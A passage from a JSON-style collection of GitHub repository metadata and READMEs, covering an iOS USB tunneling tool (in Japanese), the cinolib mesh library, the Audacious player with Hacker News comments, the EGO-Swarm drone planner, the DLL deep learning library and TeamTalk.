Mac\u306e\u30ed\u30fc\u30ab\u30eb\u30dd\u30fc\u30c8\u304b\u3089\u7aef\u672b\u306e\u30dd\u30fc\u30c8\u3078\u306eTCP\u30c8\u30f3\u30cd\u30eb\u3092\u6210\u7acb\u3059\u308b\n\n\u3082\u3057\u3082\u4f55\u3089\u304b\u306e\u7406\u7531\u3067\u4f5c\u3063\u305f\u30a2\u30d7\u30ea\u304c\u7279\u5b9a\u306eTCP\u30dd\u30fc\u30c8\u3067TCP\u30b5\u30fc\u30d0\u30fc\u3092\u7acb\u3063\u3066\u3044\u308b\u306e\u3067\u3042\u308c\u3070\u3001\nWiFi/3G\u304c\u306a\u304f\u3066\u3082\u672c\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u3063\u3066USB\u7d4c\u7531\u3067Mac\u304b\u3089\u63a5\u7d9a\u53ef\u80fd\u306b\u3059\u308b\u3002\nmobiledevice\u304cUSB\u7d4c\u7531\u3067Mac\u3068\u7aef\u672b\u9593\u306b\u30c8\u30f3\u30cd\u30eb\u3092\u6210\u7acb\u3059\u308b\u3053\u3068\u3067\u3001\nMac\uff08localhost or 127.0.0.1\uff09\u306e\u6307\u5b9a\u3057\u305fTCP\u30dd\u30fc\u30c8\u306b\uff08telnet\u306a\u3069\u3067\uff09\u63a5\u7d9a\u3059\u308c\u3070\u3001\n\u7aef\u672b\u306e\u6307\u5b9a\u3057\u305f\u30dd\u30fc\u30c8\u306b\u63a5\u7d9a\u51fa\u6765\u308b\u3002\n\n```\nmobiledevice tunnel 8080 80\n```\n\n\u4e0a\u8a18\u306e\u4f8b\u3067\u306f\u3001Mac\u306eTCP\u30dd\u30fc\u30c88080\u3068\u7aef\u672b\u306eTCP\u30dd\u30fc\u30c880\u9593\u306e\u30c8\u30f3\u30cd\u30eb\u3092\u6210\u7acb\u3059\u308b\u3002\n\u305d\u306e\u30b3\u30de\u30f3\u30c9\u306e\u51fa\u529b\u5185\u5bb9\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u3068\u306a\u308b\u3002\n\n```\nTunneling from local port 8080 to device port 80...\n```\n\n\u4e0a\u8a18\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u51fa\u305f\u3089\u3001Mac\u304b\u3089`telnet localhost 8080`\u306a\u3069\u3067\n\u7aef\u672b\u306eTCP\u30dd\u30fc\u30c880\u306b\u63a5\u7d9a\u51fa\u6765\u308b\u3088\u3046\u306b\u306a\u308b\uff01\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice tunnel -u 7c211433f02071597741e6ff5a8ea34789abbf43 8080 80\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n* CTRL-C\u3067\u30c8\u30f3\u30cd\u30eb\u3068\u3068\u3082\u306b\u30d7\u30ed\u30bb\u30b9\u3092\u7c21\u5358\u306b\u7d42\u4e86\u3055\u305b\u308b\u306b\u306f\u3001\u30c8\u30f3\u30cd\u30eb\u4f7f\u7528\u4e2d\u306b\u30d7\u30ed\u30bb\u30b9\u304c\n\u30d0\u30c3\u30af\u30b0\u30e9\u30f3\u30c9\u3067\u5b9f\u884c\u3057\u306a\u3044\u3053\u3068\u3002\n* \u30c8\u30f3\u30cd\u30eb\u4f7f\u7528\u4e2d\u306b\u30d7\u30ed\u30bb\u30b9\u3092\uff08CTRL-C\u306a\u3069\u3067\uff09\u7d42\u4e86\u3055\u305b\u308b\u3068\u3001\u63a5\u7d9a\u304c\u4e2d\u65ad\u3055\u308c\u308b\u3002\n* \u4e00\u3064\u306e\u30c8\u30f3\u30cd\u30eb\u3067\u3082\u540c\u6642\u306b\u8907\u6570\u306e\u63a5\u7d9a\u3092\u884c\u3046\u3053\u3068\u304c\u53ef\u80fd\u3068\u306a\u3063\u3066\u3044\u308b\u3002\u305f\u3060\u3057\u3001\n\u540c\u3058\u30ed\u30fc\u30ab\u30eb\u30dd\u30fc\u30c8\u3092\u6307\u5b9a\u3057\u3066\uff12\u3064\u4ee5\u4e0a\u306e\u30c8\u30f3\u30cd\u30eb\u306f\u4e0d\u53ef\u3002\n\n### .app\u30d5\u30a9\u30eb\u30c0\u30fc\u3092\u6307\u5b9a\u3057\u3066bundle identifier\u3092\u53d6\u5f97\u3059\u308b\n\n\u672c\u30b3\u30de\u30f3\u30c9\u306f\u3001Mobile Device\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u3068\u306f\u95a2\u4fc2\u306a\u3044\u304c\u4fbf\u5229\u306a\u30b3\u30de\u30f3\u30c9\u3068\u3057\u3066\u63d0\u4f9b\u3055\u308c\u3066\u3044\u308b\u3002\n\u6307\u5b9a\u3057\u305f.app\u30d5\u30a9\u30eb\u30c0\u30fc\u304b\u3089\u3001\u305d\u306e\u30a2\u30d7\u30ea\u306ebundle identifier\uff08\u4f8b\uff1acom.mycompany.myapp\uff09\u3092\n\u53d6\u5f97\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\uff08\u6ce8\u610f\uff1a.ipa\u30d5\u30a9\u30eb\u30c0\u30fc\u306f\u4e0d\u53ef\u80fd\uff09\u3002\n\n```\nmobiledevice get_bundle_id folder1/folder2/example.app\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* \u30d1\u30b9\u306f\u3001\u7aef\u672b\u4e0a\u306e\u30d1\u30b9\u3067\u306a\u304f\u30ed\u30fc\u30ab\u30eb\u306e\u30d1\u30bd\u30b3\u30f3\u4e0a\u306e\u30d1\u30b9\u3092\u6307\u5b9a\u3059\u308b\u3002\n\n## \u300c\u8ca2\u732e\u3057\u305f\u3044\uff01\u300d\n\n\u300c\u4e0d\u5177\u5408\u3092\u767a\u898b\uff01\u300d\u3001\u300c\u3053\u3093\u306a\u51c4\u3044\u6a5f\u80fd\u3092\u4f5c\u3063\u3061\u3083\u3063\u305f\u306e\u3067mobiledevice\u306b\u8ffd\u52a0\u3057\u305f\u3044\u3051\u3069...\u300d\u3068\u3044\u3063\u305f\n\u6642\u306bmobiledevice\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3092fork\u3057pull request\u3092\u304a\u9858\u3044\u3057\u307e\u3059\uff01\n\n### \u8ca2\u732e\u3057\u3066\u304f\u308c\u305f\u65b9\u3005\n\n[\u4e00\u89a7](https://github.com/imkira/mobiledevice/graphs/contributors).\n\n## \u30e9\u30a4\u30bb\u30f3\u30b9\n\nmobiledevice\u306fMIT License\u306b\u6e96\u62e0\u3059\u308b\uff1a\n\nwww.opensource.org/licenses/MIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mlivesu/cinolib", "link": "https://github.com/mlivesu/cinolib", "tags": ["geometry-processing", "computer-graphics", "polygonal-meshes", "polyhedral-meshes", "triangle-mesh", "quad-mesh", "quadrilateral-mesh", "tetrahedral-mesh", "tet-mesh", "hexahedral-mesh", "hex-mesh", "hexmesh", "tetmesh", "quadmesh", "trimesh", "mesh-generation", "mesh-processing", "surface-mesh", "volume-mesh", "geodesic"], "stars": 640, "description": "A generic programming header only C++ library for processing polygonal and polyhedral meshes", "lang": "C++", "repo_lang": "", "readme": "# CinoLib\n![MacOS](https://github.com/mlivesu/cinolib/actions/workflows/macos-build.yml/badge.svg?event=push)\n![Ubuntu](https://github.com/mlivesu/cinolib/actions/workflows/ubuntu-build.yml/badge.svg?event=push)\n![Linux](https://github.com/mlivesu/cinolib/actions/workflows/windows-build.yml/badge.svg?event=push)\n\nCinoLib is a C++ library for processing polygonal and polyhedral meshes. It supports surface meshes made of triangles, quads or general polygons as well as volumetric meshes made of tetrahedra, hexahedra or general polyhedra. \n\nA distinctive feature of the library is that all supported meshes inherit from a unique base class that implements their common traits, permitting to deploy algorithms that operate on _abstract_ meshes that may be any of the above. This allows to implement algorithms just once and run the same code on any possible mesh, thus avoiding code duplication and reducing the debugging effort.\n\n

\n\n## Positioning\nGithub hosts a whole variety of great academic libraries for mesh processing. If you do mainly geometry processing on triangle meshes, then tools like [libigl](https://libigl.github.io), [GeometryCentral](https://geometry-central.net) or [VCG](https://github.com/cnr-isti-vclab/vcglib) may be what you want. If you are interested in rendering, [Yocto/GL](https://github.com/xelatihy/yocto-gl) is extremely fast and implements many relevant algorithms. [OpenMesh](https://www.graphics.rwth-aachen.de/software/openmesh/) and [PMP](http://www.pmp-library.org) have a slightly broader scope and can handle general polygonal surfaces. For volumes, tiny portions of [libigl](https://libigl.github.io) and [GeometryCentral](https://geometry-central.net) offer rudimentary support for specific solid elements such as tetrahedra or hexahedra, but most of the library is focused on surfaces. Conversely, [OpenVolumeMesh](https://www.graphics.rwth-aachen.de/software/openvolumemesh/) is entirely focused on volumes and can operate on general polyhedral elements, but it does not support surface meshes. To the best of my knowledge, only [Geogram](https://github.com/BrunoLevy/geogram) has a unified data structure that can host both surface and volume elements, but it only supports hexahedra, tetrahedra, prisms and pyramids as volume cells. Differently from all these alternatives, CinoLib has a unique data structure that is designed to host any type of surface and volumetric element. If this comes handy to you, I am not aware of any existing alternative. Note that CinoLib trades generality for efficiency, hence all this flexibilty comes at a cost. Many optimizations that are possible when one operates on a restricted set of mesh elements cannot be applied here, especially memory-wise, where generic elements with an unpredictable number of vertices edges and faces demand the use of dynamic allocators. For this reason, in some cases CinoLib may be sligthly less efficient than the aforementioned alternatives.\n\n\n## Getting started\nCinoLib is header only. It does not need to be installed, all you have to do is to clone the repo with\n```\ngit clone https://github.com/mlivesu/cinolib.git\n```\nand include in your C++ application the header files you need. For small projects this could already be done by instructing the compiler on where to find the library sources, e.g. with the `-I` option. For more convoluted projects it is suggested to rely on a building system such as [CMake](https://cmake.org), that can also handle optional external dependencies and compilation flags or symbols.\n\n## Build a sample project (with CMake)\nHere is an example of a toy program that reads a triangle mesh and displays it on a window\n```c++\n#include \n#include \n\nint main()\n{\n using namespace cinolib;\n DrawableTrimesh<> m(\"bunny.obj\");\n GLcanvas gui;\n gui.push(&m);\n return gui.launch();\n}\n```\nand this is the `CMakeLists.txt` that can be used to compile it\n```cmake\ncmake_minimum_required(VERSION 3.2)\nproject(cinolib_demo)\nadd_executable(${PROJECT_NAME} main.cpp)\nset(CINOLIB_USES_OPENGL_GLFW_IMGUI ON)\nfind_package(cinolib REQUIRED)\ntarget_link_libraries(${PROJECT_NAME} cinolib)\n```\nCompiling should be as easy as opening a terminal in the folder containing the two files above and type\n```\nmkdir build\ncd build\ncmake .. -DCMAKE_BUILD_TYPE=Release -Dcinolib_DIR=\nmake\n```\nNote that for the rendering part CinoLib uses [GLFW](https://www.glfw.org), which will be automatically installed and linked by the script `cinolib-config.cmake`, contained in the main directory of the library. The same script can automatically download and install any other external dependency, meaning that if you want to access a functionality that depends on some external library `XXX`, all you have to do is setting to `ON` a cmake variable that looks like `CINOLIB_USES_XXX`. \nValid options are:\n* `CINOLIB_USES_OPENGL_GLFW_IMGUI`, used for rendering with OpenGL\n* `CINOLIB_USES_TRIANGLE`, used for polygon triangulation\n* `CINOLIB_USES_TETGEN`, used for tetrahedralization\n* `CINOLIB_USES_SHEWCHUK_PREDICATES`, used for exact geometric tests on input points\n* `CINOLIB_USES_INDIRECT_PREDICATES`, used for exact geometric tests on implicit points\n* `CINOLIB_USES_GRAPH_CUT`, used for graph clustering\n* `CINOLIB_USES_BOOST`, used for 2D polygon operations (e.g. thickening, clipping, 2D booleans...)\n* `CINOLIB_USES_VTK`, used just to support VTK file formats\n* `CINOLIB_USES_SPECTRA`, used for matrix eigendecomposition\n\n## GUI\nCinoLib is designed for researchers in computer graphics and geometry processing that need to quickly realize software prototypes that demonstate a novel algorithm or technique. In this context a simple OpenGL window and a side bar containing a few buttons and sliders are often more than enough. The library uses [ImGui](https://github.com/ocornut/imgui) for the GUI and [GLFW](https://www.glfw.org) for OpenGL rendering. Typical visual controls for the rendering of a mesh (e.g. shading, wireframe, texturing, planar slicing, ecc) are all encoded in two classes `cinolib::SurfaceMeshControls` and `cinolib::VolumeMeshControls`, that operate on surface and volume meshes respectively. To add a side bar that displays all such controls one can modify the sample progam above as follows:\n```c++\n#include \n#include \n#include \n\nint main()\n{\n using namespace cinolib;\n DrawableTrimesh<> m(\"bunny.obj\");\n GLcanvas gui;\n SurfaceMeshControls> mesh_controls(&m, &gui);\n gui.push(&m);\n gui.push(&mesh_controls);\n return gui.launch();\n}\n```\nThe canvas can host multiple mesh controls, ideally one of each mesh in the scene. Additional GUI elements that may be necessary to control the application (e.g. the parameters of your algorithm) can be added by implementing a dedicated callback:\n```c++\n#include \n#include \n#include \n\nint main()\n{\n using namespace cinolib;\n DrawableTrimesh<> m(\"bunny.obj\");\n GLcanvas gui;\n SurfaceMeshControls> mesh_controls(&m, &gui);\n gui.push(&m);\n gui.push(&mesh_controls);\n float val = 1.0, min = 0.0, max = 10.0;\n gui.callback_app_controls = [&]()\n {\n if(ImGui::Button(\"MyButton\"))\n {\n // button clicked: do something\n }\n if(ImGui::SliderFloat(\"MySlider\", &val, min, max))\n {\n // slider moved: do something\n } \n };\n return gui.launch();\n}\n```\nThe full list of callbacks exposed by `GLcanvas` to interact with user events (e.g. for scene navigation, mouse picking, ecc) are:\n* `callback_key_pressed(int key, int modifiers)`\n* `callback_mouse_left_click(int modifiers)`\n* `callback_mouse_left_click2(int modifiers)` => double click\n* `callback_mouse_right_click(int modifiers)` \n* `callback_mouse_right_click2(int modifiers)` => double click\n* `callback_mouse_moved(double x_pos, double y_pos)`\n* `callback_mouse_scroll(double x_offset, double y_offset)`\n* `callback_app_controls(void)`\n\n\n## Other examples\nA tutorial with detailed info on how to use the library is under developement. In the meanwhile, you can explore the [**examples**](https://github.com/mlivesu/cinolib/tree/master/examples#examples) folder, which contains a constantly growing number of sample projects that showcase the core features of the library, and will be the backbone of the forthcoming tutorial.\n\n## Contributors\nMarco Livesu is the creator and lead developer of the library. Over the years various friends and colleagues have helped me to improve the codebase, either submitting code or helping me to spot and fix bugs. A big thanks goes to: Claudio Mancinelli (University of Genoa), Daniela Cabiddu (CNR IMATI), Chrystiano Ara\u00fajo (UBC), Thomas Alderighi (CNR ISTI), Fabrizio Corda (University of Cagliari), Gianmarco Cherchi (University of Cagliari) and Tommaso Sorgente (CNR IMATI)\n\n## Citing us\nIf you use CinoLib in your academic projects, please consider citing the library using the following \nBibTeX entry:\n\n```bibtex\n@article{cinolib,\n title = {cinolib: a generic programming header only C++ library for processing polygonal and polyhedral meshes},\n author = {Livesu, Marco},\n journal = {Transactions on Computational Science XXXIV},\n series = {Lecture Notes in Computer Science},\n editor = {Springer},\n note = {https://github.com/mlivesu/cinolib/},\n year = {2019},\n doi = {10.1007/978-3-662-59958-7_4}}\n```\n\n## Acknowledgment\nThe software collected in CinoLib spans across a large period of time, starting from the beginning of my PhD to today. Since 2015, this work has been partly supported by various research projects, such as\n* [ProMED](http://arm.mi.imati.cnr.it/imati/detail_pages.php?language=ENG&view=GEN&voice_code=PRG&fcode=WHA&ref_idk=PJ-176)\n* [CHANGE](https://cordis.europa.eu/project/rcn/204834/en)\n* [CAxMan](https://cordis.europa.eu/project/id/680448)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "audacious-media-player/audacious", "link": "https://github.com/audacious-media-player/audacious", "tags": [], "stars": 639, "description": "A lightweight and versatile audio player", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "Kind of a tangent, but why switch from GTK to Qt 5? Or rather, why Qt 5 rather than some other cross platform UI framework or even GTK 3? Is it ease of porting it for new features compared to something else? And/or is Qt just that much nicer to use?Seems like the Qt5 front-end is just set as the default one, and the GTK front-end will be deprecated. There wasn't really any noticeable difference between both from the usability comparison in my opinion.Cross-platform toolkits are the lazy way. Good quality graphical apps are available in derivatives that match the interface guidelines and optimum toolkits/APIs of their platforms.Any screenshots?GTK integration in terms of look and feel on windows and macos has been so bad for so long that I think the only valid use case for it is if you're targeting gnome specifically.Audacious is pretty slick (especially with this latest release), but lacks the features that foobar2000 has that I need (namely, a directory/folder view that can replace the active playlist when clicked).If anyone is looking for a decent foobar2000 alternative, Foobnix (https://github.com/foobnix/foobnix) has worked really well for me. It has some rough edges and doesn't seem (that) actively maintained, but it gets the important stuff right. Haven't come across anything else quite like it for Linux yet, unfortunately.If there was a foobar-like folder view plugin for Audacious, I'd switch to it in a heartbeat.I always appreciate the perseverance and dedication of FOSS developers and teams. They bring a lot to the table for a whole lot of people.But something about the fonts and the UI layout always puts me off (primarily) Linux targeted (or developed) applications. Even Windows 10 doesn\u2019t use good fonts, IMO. I don\u2019t know why developers can\u2019t use good native fonts or bundle some good free fonts with the application, while also having better laid out UIs. We live in the age of 4K monitors (though most people are still on 1080p or lower) and smartphones with pretty good screens that many users are used to, and yet we have applications that look like they were developed two decades ago. Even large efforts like LibreOffice aren\u2019t immune to these deficiencies. I\u2019m not arguing for form over function, but definitely see a need for getting more UI designers into FOSS (I\u2019m not one, so my contributions are limited to monetary donations to projects I like or use).To reiterate, this is not to put down the humongous efforts (which many a times remain thankless or not adequate for putting food on the table) of FOSS developers.just posting to say thank u and share some love for audaciousLooks like this is moving from GTK2, not GTK3 ( latest ).Natural selection in action. \nIf you don't put enough effort for your framework to catch up modern language features and design principles, users would consider something else.It's alive!Which reminds me, foobar2000's Mac port seems to be chugging along\u2014though not open-source.Back in the day when I used desktop music players on linux I cycled through a whole bunch: Audacious, Rhythmbox, Banshee, Amarok, Songbird(Mozilla!), Moc(Oh, so minimal!), Cmus, mpd (server/client), and probably more that I'm forgetting now.Feel a touch nostalgic for the uncomplicated time when I had music on my devices, regularly \"organized my music library\" and could play whatever whenever, and shared them with friends. I can still rummage through my old disks and spin up some of that music from time to time.Mostly use cloud players these days; crazy to imagine that there's nothing I can do if my favorite song/recording today is not available ten years later!Title is misleading? This is just a bugfix release, QT planned for 4.0.edit: also, not the original title which reads 'Audacious 3.10 released'.> code-named \"Not Quite There Yet\"", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ZJU-FAST-Lab/ego-planner-swarm", "link": "https://github.com/ZJU-FAST-Lab/ego-planner-swarm", "tags": [], "stars": 639, "description": "An efficient single/multi-agent trajectory planner for multicopters.", "lang": "C++", "repo_lang": "", "readme": "# Quick Start within 3 Minutes \nCompiling tests passed on ubuntu **16.04, 18.04, and 20.04** with ros installed.\nYou can just execute the following commands one by one.\n```\nsudo apt-get install libarmadillo-dev\ngit clone https://github.com/ZJU-FAST-Lab/ego-planner-swarm.git\ncd ego-planner-swarm\ncatkin_make -j1\nsource devel/setup.bash\nroslaunch ego_planner simple_run.launch\n```\n\n\nIf you find this work useful or interesting, please kindly give us a star :star:, thanks!:grinning:\n\n# Acknowledgements\n\n- This work extends [EGO-Planner](https://github.com/ZJU-FAST-Lab/ego-planner) to swarm navigation.\n\n# EGO-Swarm\nEGO-Swarm: A Fully Autonomous and Decentralized Quadrotor Swarm System in Cluttered Environments\n\n**EGO-Swarm** is a decentralized and asynchronous systematic solution for multi-robot autonomous navigation in unknown obstacle-rich scenes using merely onboard resources.\n\n

\n\n\n\n\n

\n\n**Video Links:** [YouTube](https://www.youtube.com/watch?v=K5WKg8meb94&ab_channel=FeiGao), [bilibili](https://www.bilibili.com/video/BV1Nt4y1e7KD) (for Mainland China)\n\n## 1. Related Paper\nEGO-Swarm: A Fully Autonomous and Decentralized Quadrotor Swarm System in Cluttered Environments, Xin Zhou, Jiangchao Zhu, Hongyu Zhou, Chao Xu, and Fei Gao (Published in ICRA2021). [Paper link](https://ieeexplore.ieee.org/abstract/document/9561902) and [Science](https://www.sciencemag.org/news/2020/12/watch-swarm-drones-fly-through-heavy-forest-while-staying-formation) report.\n\n## 2. Standard Compilation\n\n**Requirements**: ubuntu 16.04, 18.04 or 20.04 with ros-desktop-full installation.\n\n**Step 1**. Install [Armadillo](http://arma.sourceforge.net/), which is required by **uav_simulator**.\n```\nsudo apt-get install libarmadillo-dev\n``` \n\n**Step 2**. Clone the code from github or gitee. These two repositories synchronize automatically.\n\nFrom github,\n```\ngit clone https://github.com/ZJU-FAST-Lab/ego-planner-swarm.git\n```\n\n\n\n**Step 3**. Compile,\n```\ncd ego-planner\ncatkin_make -DCMAKE_BUILD_TYPE=Release -j1\n```\n\n**Step 4**. Run.\n\nIn a terminal at the _ego-planner-swarm/_ folder, open the rviz for visualization and interactions\n```\nsource devel/setup.bash\nroslaunch ego_planner rviz.launch\n```\n\nIn another terminal at the _ego-planner-swarm/_, run the planner in simulation by\n```\nsource devel/setup.bash\nroslaunch ego_planner swarm.launch\n```\n\nThen you can follow the gif below to control the drone.\n\n

\n\n

\n\n## 3. Using an IDE\nWe recommend using [vscode](https://code.visualstudio.com/), the project file has been included in the code you have cloned, which is the _.vscode_ folder.\nThis folder is **hidden** by default.\nFollow the steps below to configure the IDE for auto code completion & jump.\nIt will take 3 minutes.\n\n**Step 1**. Install C++ and CMake extentions in vscode.\n\n**Step 2**. Re-compile the code using the command\n```\ncatkin_make -DCMAKE_BUILD_TYPE=Release -DCMAKE_EXPORT_COMPILE_COMMANDS=Yes\n```\nIt will export a compile commands file, which can help vscode to determine the code architecture.\n\n**Step 3**. Launch vscode and select the _ego-planner_ folder to open.\n```\ncode ~/<......>/ego-planner-swarm/\n```\n\nPress **Ctrl+Shift+B** in vscode to compile the code. This command is defined in _.vscode/tasks.json_.\nYou can add customized arguments after **\"args\"**. The default is **\"-DCMAKE_BUILD_TYPE=Release\"**.\n\n**Step 4**. Close and re-launch vscode, you will see the vscode has already understood the code architecture and can perform auto completion & jump.\n\n ## 4. Use GPU or Not\n Packages in this repo, **local_sensing** have GPU, CPU two different versions. By default, they are in CPU version for better compatibility. By changing\n \n ```\n set(ENABLE_CUDA false)\n ```\n \n in the _CMakeList.txt_ in **local_sensing** packages, to\n \n ```\n set(ENABLE_CUDA true)\n ```\n \nCUDA will be turned-on to generate depth images as a real depth camera does. \n\nPlease remember to also change the 'arch' and 'code' flags in the line of \n```\n set(CUDA_NVCC_FLAGS \n -gencode arch=compute_61,code=sm_61;\n ) \n``` \nin _CMakeList.txt_, if you encounter compiling error due to different Nvidia graphics card you use. You can check the right code [here](https://github.com/tpruvot/ccminer/wiki/Compatibility).\n \nDon't forget to re-compile the code!\n\n**local_sensing** is the simulated sensors. If ```ENABLE_CUDA``` **true**, it mimics the depth measured by stereo cameras and renders a depth image by GPU. If ```ENABLE_CUDA``` **false**, it will publish pointclouds with no ray-casting. Our local mapping module automatically selects whether depth images or pointclouds as its input.\n\nFor installation of CUDA, please go to [CUDA ToolKit](https://developer.nvidia.com/cuda-toolkit)\n\n## 5. Use Drone Simulation Considering Dynamics or Not\nTypical simulations use a dynamic model to calculate the motion of the drone under given commands.\nHowever, it requires continuous iterations to solve a differential equation, which consumes quite a lot computation.\nWhen launching a swarm of drones, this computation burden may cause significant lag.\nOn an i7 9700KF CPU I use, 15 drones are the upper limit.\nTherefore, for compatibility and scalability purposes, I use a \"[fake_drone](https://github.com/ZJU-FAST-Lab/ego-planner-swarm/tree/master/src/uav_simulator/fake_drone)\" package to convert commands to drone odometry directly by default.\n\nIf you want to use a more realistic quadrotor model, you can un-comment the node `quadrotor_simulator_so3` and `so3_control/SO3ControlNodelet` in [simulator.xml](https://github.com/ZJU-FAST-Lab/ego-planner-swarm/blob/master/src/planner/plan_manage/launch/simulator.xml) to enable quadrotor simulation considering dynamics.\nPlease don't forget to comment the package `poscmd_2_odom` right after the above two nodes.\n\n## 6. Utilize the Full Performance of CPU\nThe computation time of our planner is too short for the OS to increase CPU frequency, which makes the computation time tend to be longer and unstable.\n\nTherefore, we recommend you to manually set the CPU frequency to the maximum.\nFirstly, install a tool by\n```\nsudo apt install cpufrequtils\n```\nThen you can set the CPU frequency to the maximum allowed by\n```\nsudo cpufreq-set -g performance\n```\nMore information can be found in [http://www.thinkwiki.org/wiki/How_to_use_cpufrequtils](http://www.thinkwiki.org/wiki/How_to_use_cpufrequtils).\n\nNote that CPU frequency may still decrease due to high temperature in high load.\n\n\n\n# Licence\nThe source code is released under [GPLv3](http://www.gnu.org/licenses/) license.\n\n# Maintenance\nWe are still working on extending the proposed system and improving code reliability. \n\nFor any technical issues, please contact Xin Zhou (iszhouxin@zju.edu.cn) or Fei GAO (fgaoaa@zju.edu.cn).\n\nFor commercial inquiries, please contact Fei GAO (fgaoaa@zju.edu.cn).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wichtounet/dll", "link": "https://github.com/wichtounet/dll", "tags": ["c-plus-plus", "cpp", "cpp11", "cpp14", "performance", "machine-learning", "deep-learning", "artificial-neural-networks", "gpu", "rbm", "cpu", "convolutional-neural-networks"], "stars": 639, "description": "Fast Deep Learning Library (DLL) for C++ (ANNs, CNNs, RBMs, DBNs...)", "lang": "C++", "repo_lang": "", "readme": "Deep Learning Library (DLL) 1.1\n===============================\n\n|logo| |coverage| |jenkins| |license|\n\n.. |logo| image:: logo_small.png\n.. |coverage| image:: https://img.shields.io/sonar/https/sonar.baptiste-wicht.ch/dll/coverage.svg\n.. |jenkins| image:: https://img.shields.io/jenkins/s/https/jenkins.baptiste-wicht.ch/dll.svg\n.. |license| image:: https://img.shields.io/github/license/mashape/apistatus.svg\n\nDLL is a library that aims to provide a C++ implementation of Restricted\nBoltzmann Machine (RBM) and Deep Belief Network (DBN) and their convolution\nversions as well. It also has support for some more standard neural networks.\n\nFeatures\n--------\n\n* **Restricted Boltzmann Machine**\n\n * Various units: Stochastic binary, Gaussian, Softmax and nRLU units\n * Contrastive Divergence and Persistence Contrastive Divergence\n\n * CD-1 learning by default\n\n * Momentum\n * Weight decay\n * Sparsity target\n * Train as Denoising autoencoder\n\n* **Convolutional Restricted Boltzmann Machine**\n\n * Standard version\n * Version with Probabilistic Max Pooling (Honglak Lee)\n * Binary and Gaussian visible units\n * Binary and ReLU hidden units for the standard version\n * Binary hidden units for the Probabilistic Max Pooling version\n * Training with CD-k or PCD-k (only for standard version)\n * Momentum, Weight Decay, Sparsity Target\n * Train as Denoising autoencoder\n\n* **Deep Belief Network**\n\n * Pretraining with RBMs\n * Fine tuning with Conjugate Gradient\n * Fine tuning with Stochastic Gradient Descent\n * Classification with SVM (libsvm)\n\n* **Convolutional Deep Belief Network**\n\n * Pretraining with CRBMs\n * Classification with SVM (libsvm)\n\n* Input data\n\n * Input data can be either in containers or in iterators\n\n * Even if iterators are supported for SVM classifier, libsvm will move all\n the data in memory structure.\n\nBuilding\n--------\n\nNote: When you clone the library, you need to clone the sub modules as well,\nusing the --recursive option.\n\nThe folder **include** must be included with the **-I** option, as well as the\n**etl/include** folder.\n\nThis library is completely header-only, there is no need to build it.\n\nHowever, this library makes extensive use of C++11 and C++14, therefore,\na recent compiler is necessary to use it. Currently, this library is only tested\nwith g++ 9.3.0.\n\nIf for some reasons, it should not work on one of the supported compilers,\ncontact me and I'll fix it. It should work fine on recent versions of clang.\n\nThis has never been tested on Windows. While it should compile on Mingw, I don't\nexpect Visual Studio to be able to compile it for now, although VS 2017 sounds\npromising. If you have problems compiling this library, I'd be glad to help, but\ncannot guarantee that this will work on other compilers.\n\nIf you want to use GPU, you should use CUDA 8.0 or superior and CUDNN 5.0.1 or\nsuperior. I haven't tried other versions, but lower versions of CUDA, such as 7,\nshould work, and higher versions as well. If you got issues with different\nversions of CUDA and CUDNN, please open an issue on Github.\n\nLicense\n-------\n\nThis library is distributed under the terms of the MIT license, see `LICENSE`\nfile for details.\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "balloonwj/TeamTalk", "link": "https://github.com/balloonwj/TeamTalk", "tags": [], "stars": 639, "description": "\u8fd9\u662f\u6211\u7ef4\u62a4\u7684\u8611\u83c7\u8857TeamTalk\u6e90\u7801\u7248\u672c\u3002", "lang": "C++", "repo_lang": "", "readme": "TeamTalk is an open source internal instant messaging software of Mushroom Street. It currently supports multiple terminals on PC, Android, IOS, Mac and web. Here are the codes and deployment scripts of each version.\n\t\nThis is the version of TeamTalk that I maintain.\n\nIf you encounter any problems in the process of using this code, you can contact me through my WeChat public account \"**High Performance Server Development**\" for help, or contact WeChat: **easy_coder**.\n\nYou can also report issues on this page: https://github.com/baloonwj/TeamTalk/issues/1\n\nAnother open source IM developed by me - Flamingo:\n\nhttps://github.com/balloonwj/flamingo", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "torrent-file-editor/torrent-file-editor", "link": "https://github.com/torrent-file-editor/torrent-file-editor", "tags": ["qt5", "torrent", "qt4"], "stars": 639, "description": "Qt based GUI tool designed to create and edit .torrent files", "lang": "C++", "repo_lang": "", "readme": "[![Build 